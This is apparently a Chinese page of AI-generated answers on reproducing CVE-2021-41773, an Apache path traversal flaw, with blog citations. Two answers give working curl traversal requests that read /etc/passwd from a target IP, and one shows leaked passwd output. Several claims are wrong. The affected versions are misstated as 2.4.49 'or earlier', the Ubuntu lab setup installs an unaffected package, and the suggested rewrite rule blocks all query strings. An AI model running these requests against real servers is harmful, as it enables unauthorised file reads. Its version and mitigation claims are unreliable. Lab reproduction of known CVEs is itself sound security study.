cve-2021-41773

CVE-2021-41773是一个Apache HTTP Server的漏洞，攻击者可以利用该漏洞在未授权的情况下访问服务器上的任意文件。攻击者可以通过发送特定的HTTP请求来利用此漏洞，该请求将触发Apache服务器上的路径遍历漏洞，从而允许攻击者访问服务器上的任意文件。

目前，该漏洞的最佳解决方案是升级到Apache HTTP Server 2.4.51版本或更高版本。如果无法升级，可以通过在Apache服务器上添加以下规则来解决此漏洞：

RewriteEngine On
RewriteCond %{QUERY_STRING} .* [OR]
RewriteCond %{REQUEST_URI} ^/.*(\.\.)\/.*$
RewriteRule ^(.*)$ - [F]

这些规则将拒绝包含“..”字符序列的请求，并且还将拒绝包含查询字符串的请求。

相关问题

CVE-2021-41773

CVE-2021-41773是Apache HTTPd 2.4.49中的一个路径穿越漏洞，它可能允许攻击者读取Apache服务器web目录以外的其他文件，或读取web中的脚本源码。如果服务器开启了CGI或cgid服务，攻击者还可以进行任意代码执行。\[2\]这个漏洞的影响版本是Apache HTTPd 2.4.49。攻击者可以利用路径遍历问题来访问Web服务器上的文件，即使这些文件存在于Web根文件夹之外。\[3\]
#### 引用[.reference_title]
- *1* *2* [Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )](https://blog.csdn.net/qq_59975439/article/details/125225949)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item]
- *3* [Apache——CVE-2021-41773](https://blog.csdn.net/qq_45770644/article/details/120629019)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]

cve-2021-41773漏洞复现

### 回答1：
cve-2021-41773漏洞是Apache HTTP Server中的一个安全漏洞，攻击者可以利用该漏洞在未经授权的情况下访问服务器上的文件。

要复现该漏洞，可以按照以下步骤进行：

1. 安装Apache HTTP Server，并确保其版本为2.4.49或更早版本。

2. 创建一个名为“test”的目录，并在其中创建一个名为“test.txt”的文件。

3. 启动Apache HTTP Server，并访问以下URL：http://localhost/test/.%2e/%2e%2e/%2e%2e/%2e%2e/test.txt

4. 如果服务器返回“HTTP/1.1 200 OK”响应，则表示漏洞存在，攻击者可以访问服务器上的任何文件。

需要注意的是，该漏洞只影响Apache HTTP Server 2.4.49及更早版本，如果您使用的是更新版本的Apache HTTP Server，则不受此漏洞的影响。同时，为了保护服务器的安全，建议及时更新Apache HTTP Server的版本。

### 回答2：
cve-2021-41773漏洞是一种存在于Apache HTTP Server 2.4.49以前版本的目录遍历漏洞，攻击者可以通过构造恶意的GET请求来访问并读取目标服务器上没有授权读取权限的文件，例如 /usr/local/apache/logs/error.log。

这个漏洞的复现非常简单，只需要使用curl或者其他工具向目标服务器发起恶意的GET请求，即可获取目标服务器上的敏感信息。

首先需要确定目标服务器上是否安装了Apache HTTP Server，并且确认目标服务器的版本是否在2.4.49以前。可以使用nmap等端口扫描工具扫描目标服务器上是否开放了HTTP服务，并尝试访问目标服务器上的默认页面，确认是否安装了Apache HTTP Server。

如果确定目标服务器上存在Apache HTTP Server，并且版本较低，则可以使用curl等工具向目标服务器发起以下恶意请求：

curl -v http://<target_ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

其中，<target_ip>需要替换为目标服务器的IP地址，上述请求会尝试访问目标服务器上的/etc/passwd文件。如果能够获取到文件内容，则说明漏洞复现成功。

防范这个漏洞，首先需要及时升级Apache HTTP Server的版本，避免漏洞被攻击者利用。其次，可以使用Web应用程序防火墙（WAF）等安全工具来阻止滥用漏洞的请求，减少漏洞被攻击的风险。最后，建议对服务器配置进行加固，避免敏感文件被访问。

### 回答3：
cve-2021-41773漏洞是一个Apache HTTP Server的安全漏洞，可通过发送特制的HTTP请求来导致服务器上已经存在的目录结构泄露。该漏洞可能会公开网站上存在的私人和敏感信息，并为攻击者进一步攻击网站提供有关目标的有用信息。此漏洞的影响范围很广，可能影响许多版本的Apache HTTP Server。

要复现这个漏洞，我们需要在本地搭建一台Apache HTTP Server并设置虚拟主机。 在此之前，我们需要确保已经安装了Apache HTTP Server，如果没有安装Apache HTTP Server，可以通过以下命令在Ubuntu上安装：

sudo apt-get update
sudo apt-get install apache2

安装完成后，我们需要设置虚拟主机。在此例中，我们将使用名为example.com的虚拟主机。我们可以通过以下步骤进行设置：

1. 创建一个名为example.com的目录：

sudo mkdir /var/www/example.com

2. 将权限设置为Apache用户：

sudo chown -R www-data:www-data /var/www/example.com

3. 在我们刚创建的目录中创建一个名为index.html的文件：

sudo nano /var/www/example.com/index.html

输入一些HTML代码，例如“ Hi there！”

保存并关闭文件。

4.创建一个apache虚拟主机配置文件：

sudo nano /etc/apache2/sites-available/example.com.conf

在配置文件中添加以下行，以配置虚拟主机：

<VirtualHost *:80>
ServerAdmin webmaster@example.com
DocumentRoot /var/www/example.com
ServerName example.com
ServerAlias www.example.com
<Directory /var/www/example.com>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

保存并关闭文件。

5. 禁用默认虚拟主机：

sudo a2dissite 000-default.conf

6. 启用新虚拟主机：

sudo a2ensite example.com.conf

7. 配置Apache HTTP Server：

sudo service apache2 reload

现在我们已经设置了虚拟主机，我们可以开始测试漏洞。我们可以使用curl发送一个特制的HTTP请求来尝试获取服务器上的文件和目录结构。如下所示：

curl -v http://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

上面的请求意味着我们正在请求服务器上的“/etc/passwd”文件，这是一个包含用户的帐号信息的文件。执行上面命令后，我们将看到类似以下内容的响应：

...
< HTTP/1.1 200 OK
< Accept-Ranges: bytes
< Content-Length: 266
< Connection: close
< Content-Type: text/plain
...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
...

在上面的响应中我们可以看到给出的是服务器上的用户的帐户信息，这表明我们已经成功地利用了漏洞获取了服务器上的敏感信息。 攻击者可以进一步利用此信息对系统进行攻击。此外，在通过Apache HTTP Server公开网站的时候，最好配置适当的安全策略以确保保证系统的安全性。